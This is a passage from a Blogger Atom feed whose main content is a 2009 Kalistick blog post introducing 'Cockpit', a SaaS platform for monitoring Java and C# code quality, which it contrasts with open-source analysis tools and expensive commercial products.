OpenSource integration" /><author><name>Sylvain FRANCOIS</name><uri>http://www.blogger.com/profile/06251148498666563285</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="02346869876555156895" /></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/01/differences-with-opensource-integration.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DE4HQXs4eCp7ImA9WxNXF0k.&quot;"><id>tag:blogger.com,1999:blog-8882025519934625399.post-2852697006941019073</id><published>2009-01-05T14:48:00.000+01:00</published><updated>2009-10-05T14:48:50.530+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-10-05T14:48:50.530+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="cockpit" /><category scheme="http://www.blogger.com/atom/ns#" term="blog" /><category scheme="http://www.blogger.com/atom/ns#" term="tools" /><title>A Cockpit for controlling quality</title><content type="html">This post starts our blog, which is designed for sharing our experience with quality in C# and Java development projects. This experience comes from members of our R&amp;amp;D team and from what we have accumulated each day on our &lt;a href="http://www.kalistick.com/index.php/english/Cockpit/"&gt;Cockpit&lt;/a&gt; platform from the millions of lines of code that have been analyzed in our customers' projects.  &lt;p&gt;We created &lt;strong&gt;Cockpit&lt;/strong&gt; after having found that no tool controlled Java or C# development quality as &lt;strong&gt;simply&lt;/strong&gt; and &lt;strong&gt;pragmatically&lt;/strong&gt; as we wanted. The is a huge potential for improvement in the field of development technical quality. &lt;em&gt;Generally speaking&lt;/em&gt;, there are two major categories of tools on the market:&lt;/p&gt;  &lt;ul&gt;&lt;li&gt;Analysis agents, often OpenSource for Java environments, that typically specialize in a certain type of detection (metrics, style, bad practices, duplicated code, etc.) for a particular language. &lt;/li&gt;&lt;li&gt;Products, almost always commercial products, that combine the different measurement types and handle several languages in very different ways (object, procedural, query languages, etc.). &lt;/li&gt;&lt;/ul&gt;  &lt;p&gt;The first are directed mainly at technical profiles: developers, architects, technical project managers, etc. Their implementation may or may not be complex, but the effort tends to include the following steps: setting the rules and thresholds, integration into an automated process, training and raising awareness among development, definition and monitoring of an improvement plan for correcting problems, configuration maintenance, and updates to the tool. I will go into detail on all of these in &lt;a href="http://blog.kalistick.com/2009/08/differences-with-opensource-integration.html"&gt;a future post&lt;/a&gt;.&lt;/p&gt;  &lt;p&gt;As for the commercial products, the two obstacles we have identified and have confirmed with our customers are the &lt;strong&gt;cost&lt;/strong&gt; and &lt;strong&gt;complexity&lt;/strong&gt; of using them. Products of this type usually have a very high licensing cost (well over €10,000), plus the possible installation, configuration, updating, advisement, and support fees. Few projects have the necessary budgets for this. The cost can often be explained by the rich features offers to the user or by how flexibly it can be set up. But these characteristics also make using the product more complex.&lt;/p&gt;  &lt;p&gt;In both cases, many implementation attempts have failed for various reasons:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;Developers could not have enough control over the indicators.&lt;/li&gt;&lt;li&gt;They felt as if they were flooded with alerts.&lt;/li&gt;&lt;li&gt;The information provided is too technical. It does not provide an understandable view of quality for the project managers and managers who are not involved in the project management.&lt;/li&gt;&lt;li&gt;Everyone has difficulty measuring the return on investment for this quality process.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;In these conditions, monitoring quality seems more like a constraint than an way to help improve the project.&lt;/p&gt;  &lt;p&gt;This may seem extreme, but many are surely satisfied with the tools they have adopted and consider them to be effective. Yet it seems common, which is why we came up with a different approach to quality, one that can truly be perceived as positive by everyone involved with the project, not just by a single theoretical gauge:&lt;/p&gt;  &lt;ol&gt;&lt;li&gt;Monitoring quality must be &lt;strong&gt;simple&lt;/strong&gt;. This is why we have chosen a &lt;a href="http://en.wikipedia.org/wiki/Software_as_a_Service"&gt;SaaS&lt;/a&gt; model, where the user installs nothing on their own infrastructure and can start their first analysis within a few hours. This monitoring should be included in the company's development process (agile, V cycle, continuous integration, etc.).&lt;/li&gt;&lt;li&gt;Monitoring quality must be &lt;strong&gt;pragmatic&lt;/strong&gt;. Quality requirements must be adapted to the needs and context of the project. Not all projects have the same quality requirements, and overquality is costly. It is better to work toward a realistic objective that the team can achieve, perhaps by refining requirements along the way.&lt;/li&gt;&lt;li&gt;The various people involved with the project must &lt;strong&gt;share the same view&lt;/strong&gt; of the status of quality. For this, the information should be presented differently depending on the person viewing it, such as a project director or a developer, but it should express the same results. Using an external third-party service also makes it easier to adopt this common view.&lt;/li&gt;&lt;li&gt;Quality rules should be up to date and &lt;strong&gt;adapted to the current status of the application&lt;/strong&gt;. Development technologies change (languages, frameworks, etc.), and rules should follow suit. Having a statistical database that is updated daily from the analyzed project code seems to us to be a key point in guaranteeing an updated and relevant rule repository.&lt;/li&gt;&lt;/ol&gt;  &lt;p&gt;That introduces our approach. We have been working on our technology for three years. We have been able to validate our approach, validate its use by our customers, and now we can share our results with you. The next few posts will be more concrete, dealing more directly with this feedback.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8882025519934625399-2852697006941019073?l=blog.kalistick.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://blog.kalistick.com/feeds/2852697006941019073/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://blog.kalistick.com/2009/01/cockpit-for-controlling-quality_05.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/2852697006941019073?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8882025519934625399/posts/default/2852697006941019073?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/kalistick_blog_en/~3/CMCaC806rck/cockpit-for-controlling-quality_05.html" title="A Cockpit for controlling quality" /><author><name>Sylvain FRANCOIS</name><uri>http://www.blogger.com/profile/06251148498666563285</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="02346869876555156895" /></author><thr:total>0</thr:total><feedburner:origLink>http://blog.kalistick.com/2009/01/cockpit-for-controlling-quality_05.html</feedburner:origLink></entry></feed>
